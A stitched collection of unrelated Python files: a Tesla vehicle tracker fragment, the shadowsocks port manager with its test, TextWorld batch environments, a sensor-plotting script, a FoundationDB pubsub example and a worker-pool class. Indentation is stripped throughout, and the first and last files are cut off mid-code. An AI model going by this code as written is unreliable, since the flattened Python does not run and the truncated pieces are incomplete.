if not carVINs:
fatalError("Must provide the VIN(s) of one or more car(s) to be tracked")
logging.debug(f"cars: {carVINs}")
teslaVINs = [v['vin'] for v in conn.vehicles]
vinList = [v for v in teslaVINs if v in carVINs]
if not vinList:
fatalError("Unable to find requested cars in Tesla API")
notFound = list(set(carVINs) - set(vinList))
if notFound:
fatalError(f"Cars asked for, but not found in Tesla API: {notFound}")
logging.debug(f"Watching: {vinList}")
notAskedFor = list(set(teslaVINs) - set(vinList))
if notAskedFor:
logging.warning(f"Cars Tesla API knows about, but not asked for: {notAskedFor}")
vehicles = {v['vin']: v for v in conn.vehicles if v['vin'] in vinList}
if options.verbose > 3:
print("VEHICLES:")
json.dump(vehicles, sys.stdout, indent=4, sort_keys=True)
print("")
if opts.schemaFile:
schemaFile = opts.schemaFile
else:
schemaFile = opts.confs.get('schema')
if not os.path.isfile(schemaFile):
fatalError(f"Invalid DB schema file: {schemaFile}")
with open(schemaFile, "r") as f:
schema = yaml.load(f, Loader=yaml.Loader)
if opts.dbDir:
dbDir = opts.dbDir
else:
dbDir = opts.confs.get('dbDir')
if dbDir:
if not os.path.isdir(dbDir):
fatalError(f"Invalid DB directory path: {dbDir}")
else:
if opts.verbose:
logging.warning("Not logging data to DB")
cars = {}
cmdQs = {}
respQs = {}
trackers = {}
for vin in vinList:
conf = opts.confs['cars'][vin]
cars[vin] = car = Car(vin, conf, vehicles[vin])
logging.info(f"Waking up {vin}: {car.getName()}")
if not car.wakeUp():
logging.warning(f"Unable to wake up '{car.getName()}', skipping...")
time.sleep(random.randint(5, 15))
continue
# give car time to wake up and dither start times across cars
#### FIXME time.sleep(random.randint(15, 45))
cdb = None
if dbDir:
dbFile = os.path.join(dbDir, vin + ".db")
cdb = teslaDB.CarDB(vin, dbFile, schema)
tables = schema['tables'].keys()
settings = dict(DEF_SETTINGS)
dictMerge(settings, opts.confs.get('config', {}).get('settings', {}))
regions = [Region(r) for r in conf.get('regions', [])]
notifier = Notifier(opts.confs.get('config', {}).get('eventNotifiers', {}))
cmdQs[vin] = mp.Queue()
respQs[vin] = mp.Queue()
tracker = Tracker(car, cdb, tables, settings, regions, notifier,
cmdQs[vin], respQs[vin])
logging.info(f"Tracker: {vin}")
trackers[vin] = mp.Process(target=tracker.run, args=())
for vin in trackers:
trackers[vin].start()
if options.interactive:
commandInterpreter(trackers, cmdQs, respQs)
for vin in trackers:
trackers[vin].join()
logging.debug(f"Results for {vin}: {dumpQueue(respQs[vin])}")
def getOps():
def signalHandler(sig, frame):
''' Catch SIGHUP to force a reload/restart and SIGINT to stop all.
'''
if sig == signal.SIGHUP:
logging.info("SIGHUP")
#### TODO stop, reload, and restart everything
elif sig == signal.SIGINT:
logging.info("SIGINT")
for vin in cmdQs:
logging.debug(f"Stopping: {vin}")
cmdQs[vin].put("STOP")
usage = f"Usage: {sys.argv[0]} [-v] [-c <configsFile>] [-d <dbDir>] [-i] [-L <logLevel>] [-l <logFile>] [-p <passwd>] [-s <schemaFile>] [-V <VIN>]"
ap = argparse.ArgumentParser()
ap.add_argument(
"-c", "--configsFile", action="store", type=str,
default=DEF_CONFIGS_FILE, help="path to file with configurations")
ap.add_argument(
"-d", "--dbDir", action="store", type=str,
help="path to a directory that contains the DB files for cars")
ap.add_argument(
"-i", "--interactive", action="store_true", default=False,
help="enable interactive mode")
ap.add_argument(
"-L", "--logLevel", action="store", type=str, default=DEF_LOG_LEVEL,
choices=["DEBUG", "INFO", "WARNING", "ERROR", "CRITICAL"],
help="Logging level")
ap.add_argument(
"-l", "--logFile", action="store", type=str,
help="Path to location of logfile (create it if it doesn't exist)")
ap.add_argument(
"-p", "--password", action="store", type=str, help="user password")
ap.add_argument(
"-s", "--schemaFile", action="store", type=str, default=DEF_SCHEMA_FILE,
help="path to the JSON Schema file that describes the DB's tables")
ap.add_argument(
"-V", "--VIN", action="store", type=str,
help="VIN of car to use (defaults to all found in config file")
ap.add_argument(
"-v", "--verbose", action="count", default=0, help="print debug info")
opts = ap.parse_args()
if not os.path.exists(opts.configsFile):
fatalError(f"Invalid configuration file: {opts.configsFile}")
#### TODO add check if configs file has proper protections
with open(opts.configsFile, "r") as confsFile:
confs = list(yaml.load_all(confsFile, Loader=yaml.Loader))[0]
if opts.verbose > 3:
json.dump(confs, sys.stdout, indent=4, sort_keys=True) #### TMP TMP TMP
print("")
#### TODO validate config file against ./configSchema.yml, remove error checks and rely on this
if opts.logLevel:
confs['config']['logLevel'] = opts.logLevel
else:
if 'logLevel' not in confs['config']:
confs['config']['logLevel'] = DEF_LOG_LEVEL
logLevel = confs['config']['logLevel']
l = getattr(logging, logLevel, None)
if not isinstance(l, int):
fatalError(f"Invalid log level: {logLevel}")
if opts.logFile:
confs['config']['logFile'] = opts.logFile
logFile = confs['config'].get('logFile')
if opts.verbose:
print(f"Logging to: {logFile}")
if logFile:
logging.basicConfig(filename=logFile, level=l)
else:
logging.basicConfig(level=l)
opts.user = confs.get('user')
if not opts.user:
input("user: ")
logging.debug(f"user: {opts.user}")
# N.B. precedence order: command line options, then config file inputs;
# if neither is given, prompt the user for console input.
if opts.password:
password = opts.password
else:
password = confs.get('passwd')
if not password:
password = input("password: ")
opts.passwd = password
signal.signal(signal.SIGHUP, signalHandler)
signal.signal(signal.SIGINT, signalHandler)
opts.confs = confs
return opts
if __name__ == '__main__':
opts = getOps()
run(opts)
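# --- Hedged sketch of a configs file (not from the original project) --------
# getOps()/run() above expect a YAML document roughly shaped like the Python
# dict below. Every key shown is one the code actually looks up, but the
# concrete values (VIN, paths, notifier settings) are made up for illustration.
_EXAMPLE_CONFS = {
    'user': 'driver@example.com',
    'passwd': 'secret',                      # optional; prompted for if missing
    'dbDir': '/var/lib/teslawatch',          # omit to disable DB logging
    'schema': './dbSchema.yml',
    'config': {
        'logLevel': 'INFO',
        'logFile': '/var/log/teslawatch.log',
        'settings': {'intervals': {'driveState': 5}},   # merged over DEF_SETTINGS
        'eventNotifiers': {},
    },
    'cars': {
        '5YJ3EXAMPLEVIN0001': {'regions': []},
    },
}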
|
manager.py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright 2015 clowwindy
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from __future__ import absolute_import, division, print_function, \
with_statement
import errno
import traceback
import socket
import logging
import json
import collections
from shadowsocks import common, eventloop, tcprelay, udprelay, asyncdns, shell
BUF_SIZE = 1506
STAT_SEND_LIMIT = 50
class Manager(object):
def __init__(self, config):
self._config = config
self._relays = {} # (tcprelay, udprelay)
self._loop = eventloop.EventLoop()
self._dns_resolver = asyncdns.DNSResolver()
self._dns_resolver.add_to_loop(self._loop)
self._statistics = collections.defaultdict(int)
self._control_client_addr = None
try:
manager_address = common.to_str(config['manager_address'])
if ':' in manager_address:
addr = manager_address.rsplit(':', 1)
addr = addr[0], int(addr[1])
addrs = socket.getaddrinfo(addr[0], addr[1])
if addrs:
family = addrs[0][0]
else:
logging.error('invalid address: %s', manager_address)
exit(1)
else:
addr = manager_address
family = socket.AF_UNIX
self._control_socket = socket.socket(family,
socket.SOCK_DGRAM)
self._control_socket.bind(addr)
self._control_socket.setblocking(False)
except (OSError, IOError) as e:
logging.error(e)
logging.error('can not bind to manager address')
exit(1)
self._loop.add(self._control_socket,
eventloop.POLL_IN, self)
self._loop.add_periodic(self.handle_periodic)
port_password = config['port_password']
del config['port_password']
for port, password in port_password.items():
a_config = config.copy()
a_config['server_port'] = int(port)
a_config['password'] = password
self.add_port(a_config)
def add_port(self, config):
port = int(config['server_port'])
servers = self._relays.get(port, None)
if servers:
logging.error("server already exists at %s:%d" % (config['server'],
port))
return
logging.info("adding server at %s:%d" % (config['server'], port))
t = tcprelay.TCPRelay(config, self._dns_resolver, False,
stat_callback=self.stat_callback)
u = udprelay.UDPRelay(config, self._dns_resolver, False,
stat_callback=self.stat_callback)
t.add_to_loop(self._loop)
u.add_to_loop(self._loop)
self._relays[port] = (t, u)
def remove_port(self, config):
port = int(config['server_port'])
servers = self._relays.get(port, None)
if servers:
logging.info("removing server at %s:%d" % (config['server'], port))
t, u = servers
t.close(next_tick=False)
u.close(next_tick=False)
del self._relays[port]
else:
logging.error("server not exist at %s:%d" % (config['server'],
port))
def handle_event(self, sock, fd, event):
if sock == self._control_socket and event == eventloop.POLL_IN:
data, self._control_client_addr = sock.recvfrom(BUF_SIZE)
parsed = self._parse_command(data)
if parsed:
command, config = parsed
a_config = self._config.copy()
if config:
# let the command override the configuration file
a_config.update(config)
if 'server_port' not in a_config:
logging.error('can not find server_port in config')
else:
if command == 'add':
self.add_port(a_config)
self._send_control_data(b'ok')
elif command == 'remove':
self.remove_port(a_config)
self._send_control_data(b'ok')
elif command == 'ping':
self._send_control_data(b'pong')
else:
logging.error('unknown command %s', command)
def _parse_command(self, data):
# commands:
# add: {"server_port": 8000, "password": "foobar"}
# remove: {"server_port": 8000"}
data = common.to_str(data)
parts = data.split(':', 1)
if len(parts) < 2:
return data, None
command, config_json = parts
try:
config = shell.parse_json_in_str(config_json)
return command, config
except Exception as e:
logging.error(e)
return None
def stat_callback(self, port, data_len):
self._statistics[port] += data_len
def handle_periodic(self):
r = {}
i = 0
def send_data(data_dict):
if data_dict:
# use compact JSON format (without space)
data = common.to_bytes(json.dumps(data_dict,
separators=(',', ':')))
self._send_control_data(b'stat: ' + data)
for k, v in self._statistics.items():
r[k] = v
i += 1
# split the data into segments that fit in UDP packets
if i >= STAT_SEND_LIMIT:
send_data(r)
r.clear()
i = 0
if len(r) > 0:
send_data(r)
self._statistics.clear()
def _send_control_data(self, data):
if self._control_client_addr:
try:
self._control_socket.sendto(data, self._control_client_addr)
except (socket.error, OSError, IOError) as e:
error_no = eventloop.errno_from_exception(e)
if error_no in (errno.EAGAIN, errno.EINPROGRESS,
errno.EWOULDBLOCK):
return
else:
shell.print_exception(e)
if self._config['verbose']:
traceback.print_exc()
def run(self):
self._loop.run()
def run(config):
Manager(config).run()
def test():
import time
import threading
import struct
from shadowsocks import encrypt
logging.basicConfig(level=5,
format='%(asctime)s %(levelname)-8s %(message)s',
datefmt='%Y-%m-%d %H:%M:%S')
enc = []
eventloop.TIMEOUT_PRECISION = 1
def run_server():
config = shell.get_config(True)
config = config.copy()
a_config = {
'server': '127.0.0.1',
'local_port': 1081,
'port_password': {
'8381': 'foobar1',
'8382': 'foobar2'
},
'method': 'aes-256-cfb',
'manager_address': '127.0.0.1:6001',
'timeout': 60,
'fast_open': False,
'verbose': 2
}
config.update(a_config)
manager = Manager(config)
enc.append(manager)
manager.run()
t = threading.Thread(target=run_server)
t.start()
time.sleep(1)
manager = enc[0]
cli = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
cli.connect(('127.0.0.1', 6001))
# test add and remove
time.sleep(1)
cli.send(b'add: {"server_port":7001, "password":"asdfadsfasdf"}')
time.sleep(1)
assert 7001 in manager._relays
data, addr = cli.recvfrom(1506)
assert b'ok' in data
cli.send(b'remove: {"server_port":8381}')
time.sleep(1)
assert 8381 not in manager._relays
data, addr = cli.recvfrom(1506)
assert b'ok' in data
logging.info('add and remove test passed')
# test statistics for TCP
header = common.pack_addr(b'google.com') + struct.pack('>H', 80)
data = encrypt.encrypt_all(b'asdfadsfasdf', 'aes-256-cfb', 1,
header + b'GET /\r\n\r\n')
tcp_cli = socket.socket()
tcp_cli.connect(('127.0.0.1', 7001))
tcp_cli.send(data)
tcp_cli.recv(4096)
tcp_cli.close()
data, addr = cli.recvfrom(1506)
data = common.to_str(data)
assert data.startswith('stat: ')
data = data.split('stat:')[1]
stats = shell.parse_json_in_str(data)
assert '7001' in stats
logging.info('TCP statistics test passed')
# test statistics for UDP
header = common.pack_addr(b'127.0.0.1') + struct.pack('>H', 80)
data = encrypt.encrypt_all(b'foobar2', 'aes-256-cfb', 1,
header + b'test')
udp_cli = socket.socket(type=socket.SOCK_DGRAM)
udp_cli.sendto(data, ('127.0.0.1', 8382))
tcp_cli.close()
data, addr = cli.recvfrom(1506)
data = common.to_str(data)
assert data.startswith('stat: ')
data = data.split('stat:')[1]
stats = json.loads(data)
assert '8382' in stats
logging.info('UDP statistics test passed')
manager._loop.stop()
t.join()
if __name__ == '__main__':
test()
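# --- Hedged protocol summary (mirrors _parse_command/handle_event above) ----
# The manager listens on a UDP (or unix) control socket and accepts plain-text
# commands of the form "<command>: <json config>"; the port and byte counts
# below are illustrative:
#   b'add: {"server_port": 8001, "password": "example"}'  -> replies b'ok'
#   b'remove: {"server_port": 8001}'                       -> replies b'ok'
#   b'ping'                                                -> replies b'pong'
# Transfer statistics are pushed back periodically as b'stat: {"8001": 11370}'.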
|
batch_env.py
|
import multiprocessing as mp
from typing import Tuple, List, Dict
import numpy as np
from textworld.core import Environment
def _list_of_dicts_to_dict_of_lists(list_: List[Dict]) -> Dict[str, List]:
# Convert List[Dict] to Dict[List]
keys = set(key for dict_ in list_ for key in dict_)
return {key: [dict_.get(key) for dict_ in list_] for key in keys}
def _child(env_fn, parent_pipe, pipe):
"""
Event loop run by the child processes
"""
try:
parent_pipe.close()
env = env_fn()
while True:
command = pipe.recv()
# command is a tuple like ("call" | "get", "name.of.attr", extra args...)
obj = env
attrs = command[1].split(".")
for attr in attrs[:-1]:
obj = getattr(obj, attr)
if command[0] == "call":
fct = getattr(obj, attrs[-1])
result = fct(*command[2])
elif command[0] == "get":
result = getattr(obj, attrs[-1])
elif command[0] == "hasattr":
result = hasattr(obj, attrs[-1])
pipe.send(result)
finally:
env.close()
pipe.close()
class _ChildEnv:
"""
Wrapper for an env in a child process.
"""
def __init__(self, env_fn):
self._pipe, child_pipe = mp.Pipe()
self._process = mp.Process(target=_child, args=(env_fn, self._pipe, child_pipe))
self._process.daemon = True
self._process.start()
child_pipe.close()
def call(self, method, *args):
self._pipe.send(("call", method, args))
def get(self, attr):
self._pipe.send(("get", attr))
def hasattr(self, attr):
self._pipe.send(("hasattr", attr))
def result(self):
return self._pipe.recv()
def call_sync(self, *args):
self.call(*args)
return self.result()
def get_sync(self, *args):
self.get(*args)
return self.result()
def hasattr_sync(self, *args):
self.hasattr(*args)
return self.result()
def __del__(self):
self.call_sync("close")
self._pipe.close()
self._process.terminate()
self._process.join()
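# Usage sketch for _ChildEnv (assumes `make_env` is a zero-argument factory
# supplied by the caller; it mirrors how AsyncBatchEnv uses the wrapper below):
#   child = _ChildEnv(make_env)
#   obs, infos = child.call_sync("reset")       # run reset() in the child process
#   has_render = child.hasattr_sync("render")   # probe an attribute remotely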
class AsyncBatchEnv(Environment):
""" Environment to run multiple games in parallel asynchronously. """
def __init__(self, env_fns: List[callable], auto_reset: bool = False):
"""
Parameters
----------
env_fns : iterable of callable
Functions that create the environments.
"""
self.env_fns = env_fns
self.auto_reset = auto_reset
self.batch_size = len(self.env_fns)
self.envs = []
for env_fn in self.env_fns:
self.envs.append(_ChildEnv(env_fn))
def load(self, game_files: List[str]) -> None:
assert len(game_files) == len(self.envs)
for env, game_file in zip(self.envs, game_files):
env.call("load", game_file)
# Join
for env in self.envs:
env.result()
def seed(self, seed=None):
# Use a different seed for each env to decorrelate batch examples.
rng = np.random.RandomState(seed)
seeds = list(rng.randint(65635, size=self.batch_size))
for env, seed in zip(self.envs, seeds):
env.call_sync("seed", seed)
return seeds
def reset(self) -> Tuple[List[str], Dict[str, List[str]]]:
"""
Reset all environments of the batch.
Returns:
obs: Text observations, i.e. command's feedback.
infos: Information requested when creating the environments.
"""
self.last = [None] * self.batch_size
for env in self.envs:
env.call("reset")
results = [env.result() for env in self.envs]
obs, infos = zip(*results)
infos = _list_of_dicts_to_dict_of_lists(infos)
return obs, infos
def step(self, actions: List[str]) -> Tuple[List[str], int, bool, Dict[str, List[str]]]:
"""
Perform one action per environment of the batch.
Returns:
obs: Text observations, i.e. command's feedback.
reward: Current game score.
done: Whether the game is over or not.
infos: Information requested when creating the environments.
"""
results = []
for i, (env, action) in enumerate(zip(self.envs, actions)):
if self.last[i] is not None and self.last[i][2]: # Game has ended on the last step.
obs, reward, done, infos = self.last[i] # Copy last state over.
if self.auto_reset:
reward, done = 0., False
obs, infos = env.call_sync("reset")
results.append((obs, reward, done, infos))
else:
env.call("step", action)
results.append(None)
results = [result or env.result() for env, result in zip(self.envs, results)]
obs, rewards, dones, infos = zip(*results)
self.last = results
infos = _list_of_dicts_to_dict_of_lists(infos)
return obs, rewards, dones, infos
def render(self, mode='human'):
for env in self.envs:
env.call("render", mode)
return [env.result() for env in self.envs]
def close(self):
for env in self.envs:
env.call("close")
# Join
for env in self.envs:
env.result()
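# Usage sketch for AsyncBatchEnv (again assuming a user-provided `make_env`
# factory; batch size and commands are purely illustrative):
#   batch = AsyncBatchEnv([make_env] * 4, auto_reset=True)
#   obs, infos = batch.reset()
#   obs, rewards, dones, infos = batch.step(["look"] * 4)
#   batch.close()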
class SyncBatchEnv(Environment):
""" Environment to run multiple games independently synchronously. """
def __init__(self, env_fns: List[callable], auto_reset: bool = False):
"""
Parameters
----------
env_fns : iterable of callable
Functions that create the environments
"""
self.env_fns = env_fns
self.batch_size = len(self.env_fns)
self.auto_reset = auto_reset
self.envs = [env_fn() for env_fn in self.env_fns]
def load(self, game_files: List[str]) -> None:
assert len(game_files) == len(self.envs)
for env, game_file in zip(self.envs, game_files):
env.load(game_file)
def seed(self, seed=None):
# Use a different seed for each env to decorrelate batch examples.
rng = np.random.RandomState(seed)
seeds = list(rng.randint(65635, size=self.batch_size))
for env, seed in zip(self.envs, seeds):
env.seed(seed)
return seeds
def reset(self):
"""
Reset all environments of the batch.
Returns:
obs: Text observations, i.e. command's feedback.
infos: Information requested when creating the environments.
"""
self.last = [None] * self.batch_size
results = [env.reset() for env in self.envs]
obs, infos = zip(*results)
infos = _list_of_dicts_to_dict_of_lists(infos)
return obs, infos
def step(self, actions):
"""
Perform one action per environment of the batch.
Returns:
obs: Text observations, i.e. command's feedback.
reward: Current game score.
done: Whether the game is over or not.
infos: Information requested when creating the environments.
"""
results = []
for i, (env, action) in enumerate(zip(self.envs, actions)):
if self.last[i] is not None and self.last[i][2]: # Game has ended on the last step.
obs, reward, done, infos = self.last[i] # Copy last state over.
if self.auto_reset:
reward, done = 0., False
obs, infos = env.reset()
results.append((obs, reward, done, infos))
else:
results.append(env.step(action))
self.last = results
obs, rewards, dones, infos = zip(*results)
infos = _list_of_dicts_to_dict_of_lists(infos)
return obs, rewards, dones, infos
def render(self, mode='human'):
return [env.render(mode=mode) for env in self.envs]
def close(self):
for env in self.envs:
env.close()
|
data_playground.py
|
import pandas as pd
import numpy as np
import esp_connection as esp
import multiprocessing as mp
import time
import matplotlib
# Have to set the matplotlib backend explicitly, otherwise no graph is displayed
matplotlib.use("TKAgg")
import matplotlib.pyplot as plt
class DataPlayground:
def __init__(self):
self.index_data = None
self.norm_const = None
self.calibration_data = None
self.np_data = None
self.esp_data = None
self.init_queue = None
self.init_done = False
self.graph = None
self.moving_averages = np.empty([0, 7])
# set in init_from_queue
self.gravity = -1
self.gyro = -1
# pull every data point currently waiting in the esp_data queue
def get_new_data(self):
size = self.esp_data.qsize()
# because we have 7 datapoints
temp = np.empty([size, 7])
# TODO: is draining the queue one item at a time really optimal?
for i in range(size):
data = self.esp_data.get()
temp[i] = data
temp = (temp - self.calibration_data) * self.norm_const
if self.np_data is None:
self.np_data = temp
else:
self.np_data = np.append(self.np_data, temp, axis=0)
# plotting here
self.calculate_moving_average(self.index_data["GyroX"])
# plotting here
if self.np_data.shape[0] > 500:
self.plot_data(self.index_data["GyroX"])
# the initialization values are put into and read from the queue in exactly this order
def init_from_queue(self):
self.norm_const = self.init_queue.get()
self.index_data = self.init_queue.get()
self.calibration_data = self.init_queue.get()
self.gravity = self.init_queue.get()
self.gyro = self.init_queue.get()
self.init_done = True
def plot_data(self, direction):
far_back = 500
data_to_use = self.moving_averages[-far_back:, direction]
time_to_use = self.np_data[-far_back:, self.index_data["Time"]]
if self.graph is None:
# put plt in interactive mode
plt.ion()
self.graph = plt.plot(time_to_use, data_to_use)[0]
self.graph.set_ydata(data_to_use)
self.graph.set_xdata(time_to_use)
plt.axis([min(time_to_use), max(time_to_use), -250, 250])
plt.draw()
plt.pause(0.01)
# calculates and sets the moving average
# direction: tells us which axis we are getting data from (int)
# call after we set and received acceleration data
def calculate_moving_average(self, direction, num_average_over=20):
if self.np_data.shape[0] < num_average_over:
return
# here we set the window through which we will convolve and also normalize scalars
# TODO: use a nonlinear normalization, e.g. an exponentially increasing
# weighting that gives more recent datapoints more importance.
window = np.repeat(1, num_average_over) / num_average_over
if self.moving_averages.shape[0] < num_average_over:
data = self.np_data[self.moving_averages.shape[0]:, direction]
data = data * self.np_data[self.moving_averages.shape[0]:, self.index_data["Time"]]
temp = np.convolve(data, window, 'same')
else:
# need to append extra data from what we have to make moving averages more accurate
data = self.np_data[self.moving_averages.shape[0] - (num_average_over-1):, direction]
data = data * self.np_data[self.moving_averages.shape[0] - (num_average_over-1):, self.index_data["Time"]]
temp = np.convolve(data, window, 'valid')
self.moving_averages = np.append(self.moving_averages, np.empty([temp.shape[0], 7]), axis=0)
self.moving_averages[-temp.shape[0]:, direction] = temp
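# The moving average above boils down to a box-filter convolution. A minimal,
# self-contained illustration with made-up numbers:
#   window = np.repeat(1, 3) / 3
#   np.convolve([1, 2, 3, 4, 5], window, 'valid')  # -> array([2., 3., 4.])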
def start_communication(self):
# not setting it as an instance variable since we cannot
# properly communicate with it anyway.
espClient = esp.EspClient()
play = DataPlayground()
play.init_queue = mp.Queue()
play.esp_data = mp.Queue()
p = mp.Process(target=espClient.start_esp, args=(play.esp_data, play.init_queue,))
p.start()
while True:
# need to know how many things will be put in the queue beforehand.
if play.init_queue.qsize() == 5:
play.init_from_queue()
if play.init_done:
play.get_new_data()
if __name__ == "__main__":
# not setting it as an instance variable since we cannot
# properly communicate with it anyway.
espClient = esp.EspClient(raw_data=True)
play = DataPlayground()
play.init_queue = mp.Queue()
play.esp_data = mp.Queue()
p = mp.Process(target=espClient.start_esp, args=(play.esp_data, play.init_queue,))
p.start()
while True:
# need to know how many things will be put in the queue beforehand.
if play.init_queue.qsize() == 5:
play.init_from_queue()
if play.init_done:
play.get_new_data()
time.sleep(1)
|
pubsub_example.py
|
#
# pubsub_example.py
#
# This source file is part of the FoundationDB open source project
#
# Copyright 2013-2018 Apple Inc. and the FoundationDB project authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
###################
# PubSub Example #
###################
# This example generates a simple topology with specified numbers of feeds and
# inboxes. Inboxes are randomly subscribed to feeds. Each feed and inbox is then
# run in its own thread. Feeds post a specified number of messages, waiting a
# random interval between messages. Each inbox is polled for messages received,
# terminating when no messages are received for a wait limit.
import random
import threading
import time
import fdb
from pubsub import PubSub
fdb.api_version(22)
db = fdb.open()
ps = PubSub(db)
ps.clear_all_messages()
# Create the specified numbers of feeds and inboxes. Subscribe each inbox to a
# randomly selected subset of feeds.
def setup_topology(feeds, inboxes):
feed_map = {f: ps.create_feed('Alice ' + str(f)) for f in range(feeds)}
inbox_map = {}
for i in range(inboxes):
inbox_map[i] = ps.create_inbox('Bob ' + str(i))
for f in random.sample(xrange(feeds), random.randint(1, feeds)):
ps.create_subscription(inbox_map[i], feed_map[f])
return feed_map, inbox_map
# Post a fixed number of messages, waiting a random interval under 1 sec
# between each message
def feed_driver(feed, messages):
for i in range(messages):
ps.post_message(feed, 'Message {} from {}'.format(i, feed.get_name()))
time.sleep(random.random())
def get_and_print_inbox_messages(inbox, limit=10):
print "\nMessages to {}:".format(inbox.get_name())
for m in ps.get_inbox_messages(inbox, limit):
print " ->", m
# Poll the inbox every 0.1 sec, getting and printing messages received,
# until no messages have been received for 1.1 sec
def inbox_driver(inbox):
wait_limit = 1.1
wait_inc = 0.1
waited = 0.0
changed = False
latest = None
while True:
get_and_print_inbox_messages(inbox)
changed = (latest != inbox.latest_message)
latest = inbox.latest_message
if not changed and waited > wait_limit:
break
waited = 0.0 if changed else waited + wait_inc
time.sleep(wait_inc)
# Generate and run a thread for each feed and each inbox.
def run_threads(feed_map, inbox_map, messages):
feed_threads = [threading.Thread(target=feed_driver, args=(feed_map[id], messages))
for id in feed_map]
inbox_threads = [threading.Thread(target=inbox_driver, args=(inbox_map[id],))
for id in inbox_map]
for f in feed_threads:
f.start()
for i in inbox_threads:
i.start()
for f in feed_threads:
f.join()
for i in inbox_threads:
i.join()
def sample_pubsub(feeds, inboxes, messages):
feed_map, inbox_map = setup_topology(feeds, inboxes)
run_threads(feed_map, inbox_map, messages)
if __name__ == "__main__":
sample_pubsub(3, 3, 3)
|
sample-1.py
|
import asyncio
import collections
import concurrent.futures
import multiprocessing
import multiprocessing.pool
import queue
import sys
import threading
import time
import types
from .arguments import Arguments
__all__ = ["Pool"]
class Queue(object):
def __init__(self, values):
self.__reference = values
self._values = multiprocessing.Queue()
self._stop = multiprocessing.Event()
self._complete = multiprocessing.Event()
self._thread = threading.Thread(target=self.__fill, )
self._thread.start()
def __fill(self):
for element in self.__reference:
if self._stop.is_set():
break
self._values.put(element)
self._complete.set()
def empty(self):
if self._complete.is_set():
return self._values.empty()
return False
def get(self, block=True, timeout=None):
return self._values.get(block=block, timeout=timeout)
def join(self):
self._thread.join()
def stop(self):
self._stop.set()
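# Rough usage sketch for the fed Queue above (values hypothetical; in real use
# get() may raise queue.Empty while the background filler is still running):
#   q = Queue(range(5))          # a background thread feeds 0..4 into the queue
#   while not q.empty():
#       item = q.get(timeout=1)  # consume items as they arrive
#   q.stop()
#   q.join()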
async def _call_blocking(loop: asyncio.AbstractEventLoop, executor: concurrent.futures.Executor, func, *args):
futures = [
loop.run_in_executor(executor, func, *args)]
while futures:
done, futures = await asyncio.wait(
futures,
loop=loop, return_when=asyncio.ALL_COMPLETED
)
for f in done:
await f
return f.result()
class Pool(object):
def __init__(
self,
function_: collections.abc.Callable or types.FunctionType or types.MethodType,
function_arguments: Arguments or collections.abc.Iterable[Arguments or collections.abc.Iterable],
check_function: collections.abc.Callable = lambda _: True,
success_function: collections.abc.Callable = print,
max_processes: int = 1,
max_threads: int = 1,
optimize_workers: bool = True,
speed_reference: float = 0.001, # 1000 operations in 1 second
processes_as_threads: bool = False,
unsafe_workers: bool = False
):
if not isinstance(function_, collections.abc.Callable):
raise ValueError("function_ must be callable")
if not unsafe_workers:
if max_threads > 300:
raise ResourceWarning("Exceeded the safe amount of threads per process (300)")
elif max_processes > 100:
raise ResourceWarning("Exceeded the safe amount of processes (100)")
if max_processes == 0:
raise ValueError("max_processes can't be zero")
if max_threads == 0:
raise ValueError("max_threads can't be zero")
self._function = function_
self._check_function = check_function
self._success_function = success_function
self._processes = max_processes
self._threads = max_threads
self._optimize_workers = optimize_workers
self._blocking_success = None
self._processes_as_threads = processes_as_threads
self.__speed_reference = speed_reference
self._success_sync_queue = None
self._running = False
self._complete = multiprocessing.Event()
self._raw_function_arguments = (v for v in function_arguments)
self._start_thread = None
self._function_arguments = None
def _sync_success(self):
while not self._complete.is_set():
try:
self._success_function(self._success_sync_queue.get(timeout=0))
except queue.Empty:
continue
while not self._success_sync_queue.empty():
try:
self._success_function(self._success_sync_queue.get(timeout=0))
except queue.Empty:
continue
def _get(self):
return self._function_arguments.get(timeout=0)
async def _callback(self, loop: asyncio.AbstractEventLoop, executor: concurrent.futures.Executor):
while not self._function_arguments.empty():
try:
args = await _call_blocking(loop, executor, self._get)
except queue.Empty:
continue
output = await _call_blocking(loop, executor, self._function, *args)
is_valid = await _call_blocking(loop, executor, self._check_function, output)
if is_valid:
if self._blocking_success:
self._success_function(output)
else:
await _call_blocking(loop, executor, self._success_sync_queue.put, output)
async def __process_worker(self, loop: asyncio.AbstractEventLoop, executor: concurrent.futures.Executor):
futures = [self._callback(loop, executor) for _ in range(self._threads)]
while futures:
done, futures = await asyncio.wait(
futures,
loop=loop,
return_when=asyncio.ALL_COMPLETED
)
for f in done:
await f
def _process_worker(self):
for try_ in range(5):
try:
executor = concurrent.futures.ThreadPoolExecutor(max_workers=self._threads)
loop = asyncio.new_event_loop()
loop.run_until_complete(self.__process_worker(loop, executor))
loop.close()
executor.shutdown(wait=True)
return
except ImportError:
pass
def run(self) -> float:
if self._complete.is_set():
raise StopIteration("This runner has already being used")
if self._running:
raise StopIteration("This runner is being executed")
self._running = True
if (self._threads != 1 or self._processes != 1) and self._optimize_workers:
t = time.time()
result = self._function(*next(self._raw_function_arguments))
time_spent = time.time() - t
if self._check_function(result):
self._success_function(result)
if time_spent < self.__speed_reference:
self._threads = 1
self._processes = 1
self._function_arguments = self._raw_function_arguments
else:
self._function_arguments = self._raw_function_arguments
if self._threads == self._processes and self._threads == 1:
self._function_arguments: collections.abc.Iterable
start = time.time()
for args in self._function_arguments:
output = self._function(*args)
if self._check_function(output):
self._success_function(output)
return time.time() - start
self._function_arguments = Queue(self._raw_function_arguments)
if self._processes == 1 or self._threads == 1:
if self._processes > self._threads:
self._threads = self._processes
self._blocking_success = True
start = time.time()
self._process_worker()
return time.time() - start
self._blocking_success = False
self._success_sync_queue = multiprocessing.Queue()
sync_thread = threading.Thread(target=self._sync_success, )
sync_thread.start()
